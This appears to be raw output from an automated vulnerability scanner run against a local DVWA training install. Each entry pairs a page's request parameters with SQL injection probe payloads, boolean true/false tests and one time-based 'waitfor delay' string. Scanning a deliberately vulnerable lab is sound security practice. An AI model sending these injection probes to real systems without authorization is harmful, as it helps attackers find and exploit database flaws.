Target: http://localhost/dvwa/ (GET)

---
URL:http://localhost/dvwa/setup.php (POST)
VulnName: 
Query: {'user_token': '94272e222f5aa045ac5f06dc2f525bdb', 'create_db': 'Create / Reset Database'}
Payload: +and+46762=46762
+and+86118=86118
+or+82385=82385#
+and+71808=71809
Advice: 
---
---
URL:http://localhost/dvwa/instructions.php (GET)
VulnName: 
Query: {'doc': 'readme'}
Payload: ');waitfor delay '0:0:3';-- 
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/xss_r/ (GET)
VulnName: 
Query: {'user_token': '35b9fd0987289dd962530cbde0ffd6d4', 'name': 'cntvalue'}
Payload: "+and+"8613"="8613
"+and+"44442"="44442
"+or+12881=12881#
"+and+"18891"="18892
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/brute/ (POST)
VulnName: 
Query: {'username': 'cntvalue', 'user_token': '61c27d9dd4cb77b80644c354cdf19806', 'Login': 'Login', 'password': 'cntvalue'}
Payload: +and+46762=46762
+and+86118=86118
+or+82385=82385#
+and+71808=71809
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli_blind/ (GET)
VulnName: 
Query: {'user_token': '9917056d9d7c028564d027e8877fa2df', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: "+and+"8613"="8613
"+and+"44442"="44442
"+or+12881=12881#
"+and+"18891"="18892
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/captcha/ (POST)
VulnName: 
Query: {'password_current': 'cntvalue', 'password_conf': 'cntvalue', 'recaptcha_response_field': 'manual_challenge', 'recaptcha_challenge_field': '', 'password_new': 'cntvalue', 'user_token': 'c9268e6d9cbf87bffda431b1a12393dd', 'step': '1', 'Change': 'Change'}
Payload: '+and+'49930'='49930
'+and+'11762'='11762
'+or+72822=72822#
'+and+'4097'='4098
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/csrf/ (GET)
VulnName: 
Query: {'password_new': 'cntvalue', 'password_current': 'cntvalue', 'password_conf': 'cntvalue', 'Change': 'Change', 'user_token': 'f682290f9b0dec390acd30fa2b492c7a'}
Payload: "+and+"8613"="8613
"+and+"44442"="44442
"+or+12881=12881#
"+and+"18891"="18892
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli/ (GET)
VulnName: 
Query: {'user_token': 'eb733b9b14968b0ec028a9b29f2239ab', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: '	and	'44299'='44299
'	and	'89155'='89155
'	or	89339=89339#
'	and	'15196'='15197
Advice: 
---